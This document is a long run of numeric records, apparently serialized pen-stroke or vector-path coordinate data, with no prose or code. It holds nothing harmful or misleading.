0,-1 0 1,7 6-1,8 10-92,7 4-3547,-13-27-5275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3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25 380,'-6'1'930,"12"-7"409,-6 5-965,2-17 3328,3 18-3201,-5 0-374,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-8 11-32,7-12-93,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 0,1 1 1,0-1-1,-1 0 1,1 1-1,-24 47 77,15-30-62,6-14-16,0 1 0,0-1 1,1 1-1,-1 0 0,1 0 1,1 0-1,-1 0 1,0 9-1,-9 50 30,0-15 217,11 2 1281,1-51-1524,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,1-1 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0-1 0,0 1 1,2-1-1,35-6 888,-18 0-412,24-10-122,82-20-1,-122 36-364,0 1-1,0-1 1,1 1-1,-1 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0 1 1,0-1 0,0 1-1,-1-1 1,5 4-1,20 9-3,2 2-321,-29-5-1027,-18 3-1381,-7-3-2591,5-10 2247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85 420,'2'-36'5704,"-1"34"-5592,0 1-1,0-1 1,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,-1-1-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,-1-2-1,1 3 26,6-8 357,-5 7-360,-6 1 27,3 1 257,3 0-403,-1 1 1,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,1-1-1,-1 0 1,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1-1,-1 1 1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 2 0,0 6 253,0 1 1,0-1 0,-1 1 0,0-1-1,0 0 1,-5 14 0,4-10-102,0-1 0,0 1 1,2 0-1,-1-1 0,2 1 0,1 16 1,0 13 64,9 2-103,11 4-2339,-3-53-4901,-17 0 4110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24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1976,'-9'6'14376,"12"-6"-14475,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0-1,4 3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39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19 420,'0'-1'15653,"0"2"-15615,11 30 250,-11 163-292,-7-185 44,12-19-1,10-26-19,28-56 8,0 20-36,-41 69 10,0 0 0,1 1-1,-1-1 1,1 0-1,0 1 1,-1-1 0,1 1-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 1 0,5-3-1,6-3-56,-15 7 47,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,0-1 1,1 1-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1-1 1,0 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1 0,1 0-1,-1 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,1 1-1,-1-1 1,0 0 0,1 1-1,-1 0 1,9 18-307,-8-18-45,-1 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,1 0 1,7-1-2652,2 0-141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33 146 856,'52'-6'4105,"-39"6"-3839,0-2 0,0 0 0,25-7 0,-27 5-32,-1 0 1,-1-1-1,1 0 0,-1 0 0,12-9 0,5-3 705,-26 16-886,1 0 0,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 1 0,-1-3-1,-12-23 1651,11 24-1604,-1 0 0,1 1-1,-1-1 1,1 0 0,-1 1 0,1 0 0,-1-1 0,0 1-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0 0,-5 1-1,-3 1 95,-1 0-1,1 1 0,-21 7 1,21-4-87,0 0 0,0 1 0,1 0 1,0 0-1,-10 10 0,16-13-17,0-1-36,0 1 1,0 0-1,0 0 1,1 0 0,0 1-1,0-1 1,0 1-1,0 0 1,1 0-1,-1 0 1,1 0 0,1 0-1,-3 9 1,4-11-49,1-1 0,-1 1 1,1-1-1,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 0 1,1 0-1,-1 0 0,4 0 1,67 17-24,-63-16 6,21 4-1366,46 1 0,-74-7 775,0 0 1,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,-1-1 0,1 1 0,-1 0 0,5-4 0,2 0-1860,2-1-460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31 1104,'-2'-23'6919,"-1"21"-6638,0 1 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,0 0 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0 0 0,0 1 0,0-1 1,-5 4-1,3-3-148,0 1 1,1 1 0,-1-1-1,1 1 1,0 0-1,0-1 1,0 2-1,1-1 1,-1 0-1,1 1 1,-4 8-1,3-5 43,-1 2-72,0 1 0,0 1 1,2-1-1,-1 1 0,1-1 1,-2 23-1,-6 33 94,5-40-45,5-25-131,0 0 0,0 0 0,0 1-1,1-1 1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,0 1 0,1-1 0,-1 1 0,2 4 0,16 83 298,-8-42-270,-8-40-57,0 0 0,-1 0 0,0 0 0,-1 1 0,1-1 0,-2 0-1,-1 14 1,0 7 14,-8 15-49,-1-14-289,11 14 619,0-28-3474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64 904,'0'0'1370,"31"-18"4045,-28 14-5240,1-1 0,1 1 0,-1 1-1,1-1 1,-1 1 0,1 0 0,0 0-1,0 0 1,1 1 0,-1-1 0,0 2-1,1-1 1,-1 0 0,1 1 0,0 0-1,6 0 1,1 0-469,0 2 0,0-1 0,0 2 0,0 0 0,-1 0 0,15 5 0,-16-6-3372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2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1028,'0'0'4721,"-35"18"-820,14 0-2818,18-15-920,0-1-1,0 0 1,0 1-1,0-1 1,0 1-1,1 0 1,-1 0-1,1 0 1,0 0-1,-3 6 0,-22 32 1317,22-36-1297,1 0 0,-1 1 0,2 0 0,-1 0-1,1 0 1,-1 0 0,-3 11 0,-46 182 1234,51-190-1407,1-1 1,0 1 0,1-1 0,1 16 0,0-4-8,-1-18-3,0-1 1,1 1-1,-1 0 1,1-1 0,0 1-1,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1-1 1,-1 1 0,1 0-1,-1-1 1,1 1-1,0-1 1,-1 0-1,4 1 1,55 3-631,-21-9-3281,-14-8-2857,-14 7 3346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0 114 280,'35'-11'4766,"-11"5"-3860,-21 6-852,0 0 0,0-1 1,0 1-1,-1-1 0,1 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1-1-1,5-2 0,36-25 839,-42 29-855,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,-1 1 1,1-1-1,-1 0 1,1 0-1,0 1 0,-1-1 1,0 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 0-1,-1 0 0,1 1 1,-1-1-1,0 0 1,1 1-1,-1-1 1,0 0-1,1 1 0,-1-1 1,-1 0-1,0 0 43,0-1-1,0 0 0,0 1 0,0 0 0,0-1 1,-1 1-1,1 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 1 0,1-1 1,-1 1-1,1 0 0,-4 0 0,1 2 23,1-1-1,-1 1 1,0-1-1,0 2 0,1-1 1,0 0-1,-1 1 1,1 0-1,0 0 0,0 0 1,0 0-1,1 1 1,-1 0-1,1-1 0,0 1 1,0 0-1,0 1 1,0-1-1,-3 8 0,3-1 2,-1 0 0,1 1-1,1-1 1,0 1-1,1 0 1,0 0 0,1 13-1,1-24-102,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0 0,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,2 1 1,44 6-397,-21-4-1867,9-3-5049,-16-5 4368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3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19 360,'-23'-11'5987,"-3"4"-3565,24 7-2371,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 0 0,0 1 0,1-1 1,-1 0-1,1 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,-1 1 1,0 0 10,0 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,-6 3 0,7-5-34,0 0 0,1 0-1,-1 0 1,0 1 0,0-1 0,1 0 0,-1 1 0,1 0 0,-1-1 0,1 1-1,-1 0 1,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,1 1 1,-1-1 0,1 4 0,-1-5 20,1 1 0,0 0 1,0-1-1,0 1 0,1 0 0,-1-1 1,0 1-1,1-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,0 1 0,-1-1 0,1 1 1,0-1-1,2 2 0,1 2 110,-1-1-147,0 0 1,0 0-1,0 0 1,1 0 0,0-1-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,1-1 1,-1 0 0,1 0-1,0 0 1,9 2-1,17-2-282,6-2-1503,-33 0 1306,-1-1 1,1 0 0,-1-1 0,0 1-1,0 0 1,1-1 0,-1 0 0,0 0 0,0 0-1,4-3 1,5-4-2095,8-2-41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 1624,'0'0'1558,"-7"-1"4030,3 1-4632,-7 57 490,1 10-808,6-54-444,2 1-1,0 0 1,-1 15-1,-8 69 202,11 71-1337,0-169 875,0 0-1,-1 0 0,1 1 1,0-1-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0-1-1,-1 1 1,1 0-1,0 0 0,0 0 1,-1 0-1,1-1 1,0 1-1,0 0 0,0 0 1,-1-1-1,1 1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 1,1 0-1,0-1 0,0 1 1,0-1-1,-12-11-2933,-6-6-344,16 5 1424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4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63 192,'2'-24'8177,"1"20"-7700,1 0 0,0 1 0,0-1 0,0 1 0,0 0 1,0 0-1,1 0 0,6-3 0,-7 5-451,0 0 0,0-1 0,0 2 0,0-1 0,0 0 0,1 1 0,-1 0-1,0 0 1,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,7 4 0,-2-2-65,33 18-2289,7-6-5061,-28-11 4431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40 708,'0'7'12882,"0"-8"-12566,-5 1 262,4-1-558,1 1 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,-1 1 1,1-1-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 1-1,0-1 1,-1 0-1,1 1 1,0-1-1,0 1 1,-1-1-1,1 0 1,0 1 0,0-1-1,0 1 1,-1 0-1,-3 4 62,4-4-71,-1-1 1,1 0-1,0 0 0,-1 0 1,1 1-1,-1-1 0,1 0 0,0 0 1,-1 1-1,1-1 0,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 1,-1 0-1,1 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,1 0 0,-12 34 579,0 20-401,0 10-139,0-9-43,1 40 18,-1-23-17,11-56-74,3-22-58,3-13 236,5-55 40,21-97-124,-30 162-27,0 0 0,0 1 1,0 0 0,0 0 0,1-1 0,0 2-1,0-1 1,0 0 0,1 1 0,0-1 0,1 1-1,-1 0 1,1 0 0,0 1 0,11-9 0,16-16-13,-26 24 9,0 0-1,1 0 0,-1 1 0,14-9 0,-12 8 8,-7 5-5,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,-1 0 0,0 0-1,0 0 1,1 1-1,-1-1 1,0 1 0,1-1-1,-1 1 1,0-1 0,1 1-1,-1 0 1,1 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,1-1-1,-1 1 1,0 0 0,0 0-1,0-1 1,1 1-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 2 0,-1-1-5,0-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-3 3 0,-1 3-23,-1-1 1,0 0-1,0 0 1,-10 10-1,9-10-33,-1-1-269,1 0 0,0-1 0,-1 0 0,0 0 0,0-1 0,-1 0-1,1 0 1,-1-1 0,-12 4 0,13-4-621,-1-1 0,1 0 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 0 0,0-1 0,-13-2 0,10 2-1168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7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37 1092,'-9'36'4717,"21"-9"-3933,-12-25-721,1 1 1,0 0 0,0 0 0,0 0 0,0-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,3 3 0,49 36 499,-51-40-542,0 0 1,0 0 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,0-1 0,1 1-1,-1 0 1,0-1 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,0-1 0,1 1-1,-1-1 1,0 0 0,0 0-1,1 0 1,-1-1 0,0 1 0,0-1-1,0 1 1,-1-1 0,6-4-1,1-1 50,0 0 0,-1-1 0,1 0 0,-2 0 0,1-1-1,-1 0 1,8-13 0,-14 20-19,-1 0 1,1 0-1,0 0 0,-1 1 1,1-1-1,-1 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,1 1 0,-1-1 1,0 0-1,-1-2 0,-4-16 357,5 19-360,1 0-1,-1-1 1,1 1 0,-1 0-1,0-1 1,0 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,-1-1 1,1 1 0,-3-1-1,-34-7 910,29 8-885,1 0-1,-1 1 1,0 0 0,0 0-1,1 1 1,-1 0 0,1 1-1,0 0 1,-1 0 0,1 0-1,0 1 1,1 1 0,-1-1-1,1 1 1,-9 8 0,14-12-75,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 1,1 1-1,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,3 4-1,-2-3 0,1-1 1,-1 0 0,1 0-1,0 1 1,0-1 0,0 0-1,0 0 1,1-1 0,-1 1-1,0 0 1,1-1 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0-1,0 0 1,0-1 0,-1 1-1,1-1 1,0 0 0,4 1-1,157-1-57,-160 0 59,1 1 0,-1-1 0,0 1 0,0 0 0,1 1 1,-1-1-1,7 4 0,-10-4 1,1-1 1,-1 1 0,0 0-1,1-1 1,-1 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0-1,1 1 1,-1-1 0,0 0-1,0 0 1,-1 1 0,1-1-1,0 1 1,0-1-1,-1 1 1,2 1 0,3 5-196,-3-6-190,-8 6-124,2 4-2574,-2-1-2609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2 360,'0'-1'5323,"0"2"-4789,9 17 2134,7 2-1231,-13-15-1217,1 0-1,0 0 1,0 0 0,0-1 0,1 0-1,-1 0 1,7 4 0,0 3-70,0-2-62,2-4-48,-12-4-39,1 0 0,-1-1-1,1 1 1,-1 0 0,1-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,-1 0-1,1-1 1,0 1 0,-1 0 0,1-1-1,0 1 1,-1-1 0,1 0-1,-1 1 1,1-1 0,1-1-1,61-34-78,-21 0 98,-27 23 18,-6 5 9,-10 8-45,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,-1 1 1,1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 1-1,0-1 0,-2 0 50,-21 19 339,17-12-272,1 0 0,-1 0 0,0-1 0,-1 0 0,-10 9 0,-19 17 519,-115 141 1181,138-158-1819,1 1-1,0 0 1,-15 28 0,16-13-25,10-31-2,1 1-1,-1 0 1,1-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,-1 0-1,1 0 1,0-1-1,0 1 1,0 0-1,0 0 1,-1 0-1,1-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,1-1-1,-1 1 1,0 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1-1 1,-1 1-1,1-1 1,0 2-1,0-2-118,-1 1 1,1-1-1,-1 1 0,1-1 1,0 0-1,-1 1 0,1-1 0,0 1 1,-1-1-1,1 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0-1 1,0 1-1,-1 0 0,1 0 0,0-1 1,0 1-1,-1 0 0,1-1 0,0 1 1,-1-1-1,1 1 0,-1-1 0,1 1 1,-1-1-1,2 0 0,10-17-5720,-1 6 2862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1 420,'0'0'2994,"-1"13"894,-25 14-890,10-7-1682,2-5-660,11-11-435,-1-1-1,1 1 0,0 0 1,-1 0-1,2 0 0,-1 0 1,0 1-1,-3 8 0,-26 49 1540,0 34-869,25-71-767,4-16-94,0 1 0,1 0 1,0 0-1,-1 17 1,3-24-35,1 1 1,0 0 0,0 0 0,0-1-1,0 1 1,0-1 0,1 1 0,-1-1-1,1 1 1,0-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,4 3-1,14 0-574,0 1 1,32 17-1,-52-24 293,0 0-1,0 0 1,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1-1 0,1 1 0,0 0-1,0 0 1,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0-1,0-1 1,-1 1 0,1-1 0,0 1 0,-1 0-1,1-1 1,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1-1,1 1 1,-1-2 0,1 1 141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43 308,'0'7'3592,"0"24"-2025,0-27-1525,0 0 0,1 0 1,0 0-1,-1-1 1,2 1-1,-1 0 0,0 0 1,1-1-1,-1 1 1,1 0-1,0-1 1,0 0-1,1 1 0,-1-1 1,1 0-1,-1 0 1,1 0-1,0-1 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,1-1-1,-1 1 0,1 0 1,0-1-1,0 0 1,-1 0-1,1 0 0,0 0 1,0-1-1,0 1 1,0-1-1,0 0 1,0 0-1,0-1 0,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 0,1 0 1,0-1-1,-1 0 1,1 0-1,-1 0 1,1 0-1,5-5 0,22-12 89,-28 17-105,1 1 0,-1-1-1,1 0 1,-1 0 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,-1 0 0,1 0 0,-1 0 0,0 0 0,3-5-1,-3 4 3,-2 3 5,1 0 0,0 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 1 0,-1-3 0,-6-9 712,7 10-683,1 1-1,-1 0 1,0-1 0,0 1 0,1 0-1,-1 0 1,0-1 0,0 1 0,-1 0-1,1 0 1,0 0 0,0 0 0,-2-1-1,-3-1 55,-1 0-1,1 1 1,0-1-1,-1 2 1,1-1-1,-1 0 1,0 1-1,1 0 1,-1 1-1,-13 0 0,17 0-112,0 0 0,-1 1-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 1-1,0-1 1,0 1 0,0 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-2 3 1,-5 7-164,8-12 92,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,1 0 0,-1 0 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,1 1 0,0-1 1,-1 1-1,1 1 0,-11 20-5391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4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33 119 280,'-1'0'211,"0"0"-1,-1 0 1,1 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,1-1-1,0 1 1,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 1 0,-1 1-1,1-2-164,0 1 0,0-1-1,1 0 1,-1 1 0,0 0 0,1-1-1,-1 1 1,1-1 0,0 1-1,0 0 1,-1-1 0,1 1-1,0-1 1,0 1 0,1 0 0,-1-1-1,0 1 1,0 0 0,1-1-1,-1 1 1,1-1 0,0 1-1,-1-1 1,1 1 0,0-1-1,0 0 1,0 1 0,1 1 0,6 12 142,-8-13-182,1-1 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0-1-1,2 2 1,0 0 1,1-1 0,-1 0-1,0 0 1,1 0 0,-1 0 0,1-1-1,-1 1 1,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0-1-1,-1 1 1,0-1 0,1 0-1,-1 0 1,1 0 0,-1-1 0,0 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,-1-1-1,3-2 1,35-31 541,-38 31-343,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 1,0 0-1,0 0 0,0-1 1,-1 1-1,0 0 0,0 0 0,0-1 1,-1 1-1,1 0 0,-1 0 1,-1 0-1,1 0 0,-1 0 0,-2-5 1,-28-34 1714,31 43-1893,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0 0-1,0-1 1,-1 1 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1-1,0 0 1,0 1 0,0-1-1,-1 1 1,1 0 0,0-1-1,-1 2 1,-35 32-79,25-21 113,9-11-61,0 2 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,1 0 0,-3 5 0,4-7-3,-1 0 0,0 0-1,1 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,1-1-1,-1 0 1,1-1 0,0 1 0,0 0 0,2 3-1,3 5-25,-6-9 25,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 1,0 0-1,-1 0 0,1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 1 1,-1-1-1,1 1 0,0-1 0,2 1 0,4 1-126,28 11-2095,-34-12 2055,-1-1-1,1 0 0,-1 1 1,1-1-1,-1 0 0,1 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1-1-1,0 1 0,-1 0 1,1-1-1,-1 1 0,1-1 1,-1 1-1,0 0 0,1-1 1,-1 1-1,1-1 0,-1 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1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68 1316,'-5'22'4056,"5"-21"-4013,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 0 1,0 1-1,0-1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 1,-1-1-1,2 2 0,9 33 190,-10-34-231,0 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1-1,1-1 1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,4 1 0,-2-2-2,-1 0 0,1 0-1,-1-1 1,1 0 0,-1 1 0,0-1 0,1-1-1,-1 1 1,0 0 0,0-1 0,0 0-1,6-4 1,0 1 2,0-1-1,0 0 1,0-1-1,-1 0 1,11-12-1,-17 16 114,0-1-1,0 0 1,0 0-1,-1 0 1,0 0-1,1-1 1,-2 1-1,1-1 1,0 1-1,-1-1 1,0 0-1,0 1 1,0-1-1,-1 0 1,0-7-1,0 10-38,-1-1 1,1 1-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 1 0,-1-1 1,0 1-1,0-1 1,1 1-1,-1-1 0,0 1 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 1 1,-4-2-1,3 1-39,-1 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 1-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 1 1,0-1-1,1 1 1,-1 0-1,-5 2 1,5-1-32,-12 7 17,1 0 1,-26 21-1,37-27-29,1 0-1,-1 0 1,1 0-1,0 0 0,0 1 1,0 0-1,0 0 0,1-1 1,-1 1-1,1 1 1,0-1-1,0 0 0,1 0 1,-1 1-1,1-1 1,-1 8-1,-2 8-154,3-19 128,1 0 1,0 0-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,0 0 1,1 0 0,-1 1-1,0-1 1,0 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,0 1 1,4 7-1188,-5-8 1076,0-1 1,0 1 0,1 0 0,-1-1-1,0 1 1,1 0 0,-1-1-1,1 1 1,-1-1 0,0 1 0,1-1-1,-1 1 1,1-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 1-1,-1-1 1,1 0 0,0 1 0,-1-1-1,1 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,2-1 0,7 1-2052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49 464,'0'-48'7999,"-20"67"-6676,17-11-1161,1-1 1,0 1 0,0 0-1,1 0 1,0 0 0,0 17-1,0 4-5,0-12-159,1 0 0,1 0 0,0 0-1,8 31 1,16 37 50,-24-82-63,1 2-346,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,1 0 1,0 0 0,5 5-1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1476,'-1'19'6580,"-7"17"-5663,6-28-852,0 1-1,1 0 1,0 0-1,0 0 1,1 0-1,1 1 0,1 11 1,0 10-81,-2-29 19,0 3-105,0 0 0,0 0 0,0 0 0,0 0-1,-1 0 1,0 0 0,0 0 0,-1 0-1,-2 7 1,4-11 84,0-1 0,-1 0 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 